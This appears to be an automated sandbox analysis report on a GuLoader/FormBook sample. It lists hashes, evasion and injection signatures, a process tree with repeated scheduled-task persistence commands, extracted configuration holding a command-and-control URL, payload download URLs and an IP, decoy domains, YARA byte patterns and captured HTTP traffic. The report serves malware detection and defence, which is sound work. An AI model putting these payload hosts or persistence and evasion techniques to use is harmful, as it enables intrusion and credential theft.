Play interactive tour

Edit tour

Analysis Report os9TZxfmTZ.exe

Overview

General Information

Sample Name:	os9TZxfmTZ.exe
Analysis ID:	385246
MD5:	ad0c93b574bb947cff15483eda82811e
SHA1:	ad379c5a86bf646c4a079e737a364ab352107e5b
SHA256:	bcaac39113bd17158fe86a77328f97e9c3fa14860c9c4449a8ae0768c85243f4
Tags:	exeGuLoader
Infos:
Most interesting Screenshot:

Detection

FormBook GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Potential malicious icon found

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to hide a thread from the debugger

Creates an undocumented autostart registry key

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Drops PE files with benign system names

Drops executables to the windows directory (C:\Windows) and starts them

Hides threads from debuggers

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected VB6 Downloader Generic

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Installs a global mouse hook

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains strange resources

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

os9TZxfmTZ.exe (PID: 6248 cmdline: 'C:\Users\user\Desktop\os9TZxfmTZ.exe' MD5: AD0C93B574BB947CFF15483EDA82811E)

os9tzxfmtz.exe (PID: 6280 cmdline: c:\users\user\desktop\os9tzxfmtz.exe MD5: ABBFBEC83B67CA488DF807F74D5773B7)

os9tzxfmtz.exe (PID: 6328 cmdline: c:\users\user\desktop\os9tzxfmtz.exe MD5: ABBFBEC83B67CA488DF807F74D5773B7)

icsys.icn.exe (PID: 6336 cmdline: C:\Users\user\AppData\Local\icsys.icn.exe MD5: D5809935B2F8A4579AAADCA96C2920EE)

explorer.exe (PID: 6384 cmdline: c:\windows\system\explorer.exe MD5: 0CE3C90CA3FCFCD7C234D580BF184F0A)

spoolsv.exe (PID: 6408 cmdline: c:\windows\system\spoolsv.exe SE MD5: 299A35006AE04B5DD9C7BC9D0B30CA9F)

svchost.exe (PID: 6440 cmdline: c:\windows\system\svchost.exe MD5: 7718CCEC6D9968F3EFF22F24955DFD38)

spoolsv.exe (PID: 6632 cmdline: c:\windows\system\spoolsv.exe PR MD5: 299A35006AE04B5DD9C7BC9D0B30CA9F)

at.exe (PID: 6752 cmdline: at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)

conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

at.exe (PID: 6820 cmdline: at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)

conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

at.exe (PID: 6836 cmdline: at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)

conhost.exe (PID: 6900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

at.exe (PID: 6916 cmdline: at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)

conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

at.exe (PID: 6960 cmdline: at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)

conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

at.exe (PID: 7020 cmdline: at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)

conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

at.exe (PID: 7036 cmdline: at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)

conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

at.exe (PID: 7080 cmdline: at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)

conhost.exe (PID: 7112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

at.exe (PID: 7160 cmdline: at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)

conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

at.exe (PID: 3676 cmdline: at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)

conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

at.exe (PID: 5904 cmdline: at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)

conhost.exe (PID: 2200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

at.exe (PID: 6720 cmdline: at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)

conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

at.exe (PID: 6788 cmdline: at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)

svchost.exe (PID: 6616 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7152 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6128 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

explorer.exe (PID: 6824 cmdline: 'C:\windows\system\explorer.exe' RO MD5: 0CE3C90CA3FCFCD7C234D580BF184F0A)

svchost.exe (PID: 408 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.evolvekitchendesign.com/ffw/"], "decoy": ["unmutedgenerations.com", "localmoversuae.com", "centralrea.com", "geyyfphzoe.com", "silverpackfactory.com", "techtronixx.com", "shop-deinen-deal.com", "buehne.cloud", "inspirefreedomtoday.com", "chapelcouture.com", "easton-taiwan.com", "quanaonudep.store", "merzigomusic.com", "wpzoomin.com", "service-lkytrsahdfpedf.com", "yeasuc.com", "mydogtrainingservice.com", "galeribisnisonline.com", "cscremodeling.com", "bom-zzxx.com", "ensobet88.com", "vegancto.com", "digivisiol.com", "advancetools.net", "gzqyjd.com", "xtgnsl.com", "ftfortmyers.com", "g-siqueira.com", "ufdzbhrxk.icu", "tiekotiin.com", "youschrutedit.com", "takahatadenkikouji.com", "goodfastco.com", "jtelitetraining.com", "planet-hype.com", "gigwindow.com", "levelxpr.com", "besttechmobcomm.info", "funneldesigngenie.com", "mylisting.cloud", "alltwoyou.com", "mortgagesandprotection.online", "monthlydigest.info", "senlangdq.com", "postphenomenon.com", "slymwhite.com", "masonpreschool.com", "wahooshop.com", "meridiangummies.com", "samsungpartsdept.com", "saludbellezaybienestar.net", "vickifoxproductions.com", "shawandwesson.info", "nutrepele.com", "gorillatanks.com", "praktijkinfinity.online", "lanteredam.com", "refinedmanagement.com", "tiwapay.com", "fruitsinbeers.com", "charliekay.net", "realironart.com", "sonsofmari.com", "kedingtonni.com"]}

Threatname: GuLoader

{"Payload URL": "https://demo.sdssoftltd.co.uk/bin_iOxAb78.bin\u0000http://103.141.138.118/bin_iOxAb78"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xd8e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xdb62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x19685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x19171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x19787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x198ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xe57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x183ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xf273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1f327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x2032a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1c409:$sqlite3step: 68 34 1C 7B E1 0x1c51c:$sqlite3step: 68 34 1C 7B E1 0x1c438:$sqlite3text: 68 38 2A 90 C5 0x1c55d:$sqlite3text: 68 38 2A 90 C5 0x1c44b:$sqlite3blob: 68 53 D8 7F 8C 0x1c573:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: os9tzxfmtz.exe PID: 6280	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: os9tzxfmtz.exe PID: 6280	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Click to see the 6 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: os9TZxfmTZ.exe

Avira: detected

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\icsys.icn.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\mrsys.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Windows\System\svchost.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\stsys.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Windows\System\spoolsv.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Windows\System\explorer.exe	Avira: detection malicious, Label: TR/Dropper.Gen

Found malware configuration

Show sources

Source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp	Malware Configuration Extractor: FormBook {"C2 list": ["www.evolvekitchendesign.com/ffw/"], "decoy": ["unmutedgenerations.com", "localmoversuae.com", "centralrea.com", "geyyfphzoe.com", "silverpackfactory.com", "techtronixx.com", "shop-deinen-deal.com", "buehne.cloud", "inspirefreedomtoday.com", "chapelcouture.com", "easton-taiwan.com", "quanaonudep.store", "merzigomusic.com", "wpzoomin.com", "service-lkytrsahdfpedf.com", "yeasuc.com", "mydogtrainingservice.com", "galeribisnisonline.com", "cscremodeling.com", "bom-zzxx.com", "ensobet88.com", "vegancto.com", "digivisiol.com", "advancetools.net", "gzqyjd.com", "xtgnsl.com", "ftfortmyers.com", "g-siqueira.com", "ufdzbhrxk.icu", "tiekotiin.com", "youschrutedit.com", "takahatadenkikouji.com", "goodfastco.com", "jtelitetraining.com", "planet-hype.com", "gigwindow.com", "levelxpr.com", "besttechmobcomm.info", "funneldesigngenie.com", "mylisting.cloud", "alltwoyou.com", "mortgagesandprotection.online", "monthlydigest.info", "senlangdq.com", "postphenomenon.com", "slymwhite.com", "masonpreschool.com", "wahooshop.com", "meridiangummies.com", "samsungpartsdept.com", "saludbellezaybienestar.net", "vickifoxproductions.com", "shawandwesson.info", "nutrepele.com", "gorillatanks.com", "praktijkinfinity.online", "lanteredam.com", "refinedmanagement.com", "tiwapay.com", "fruitsinbeers.com", "charliekay.net", "realironart.com", "sonsofmari.com", "kedingtonni.com"]}
Source: 0000001D.00000002.347705923.0000000000563000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://demo.sdssoftltd.co.uk/bin_iOxAb78.bin\u0000http://103.141.138.118/bin_iOxAb78"}

Multi AV Scanner detection for submitted file

Show sources

Source: os9TZxfmTZ.exe	Virustotal: Detection: 82%			Perma Link
Source: os9TZxfmTZ.exe	ReversingLabs: Detection: 95%

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, type: MEMORY

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\icsys.icn.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\mrsys.exe	Joe Sandbox ML: detected
Source: C:\Windows\System\svchost.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\stsys.exe	Joe Sandbox ML: detected
Source: C:\Windows\System\spoolsv.exe	Joe Sandbox ML: detected
Source: C:\Windows\System\explorer.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: os9TZxfmTZ.exe

Joe Sandbox ML: detected

Source: 2.2.icsys.icn.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 8.2.spoolsv.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 5.2.spoolsv.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 38.2.explorer.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 8.0.spoolsv.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 0.2.os9TZxfmTZ.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 2.0.icsys.icn.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 4.0.explorer.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 6.0.svchost.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 4.2.explorer.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 5.0.spoolsv.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 38.0.explorer.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 0.0.os9TZxfmTZ.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen

Source: os9TZxfmTZ.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source:	Binary string: explorer.pdbUGP source: os9tzxfmtz.exe , 0000001D.00000002.353878128.000000001E6B0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: os9tzxfmtz.exe , 0000001D.00000002.353360463.000000001E380000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: os9tzxfmtz.exe
Source:	Binary string: explorer.pdb source: os9tzxfmtz.exe , 0000001D.00000002.353878128.000000001E6B0000.00000040.00000001.sdmp

Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Code function: 4x nop then push ebp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: www.evolvekitchendesign.com/ffw/
Source: Malware configuration extractor	URLs: https://demo.sdssoftltd.co.uk/bin_iOxAb78.binhttp://103.141.138.118/bin_iOxAb78

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive

Source: C:\Users\user\Desktop\os9tzxfmtz.exe

Code function: 29_2_00569F5D InternetReadFile,

Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: vccmd01.googlecode.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Mon, 12 Apr 2021 06:59:22 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 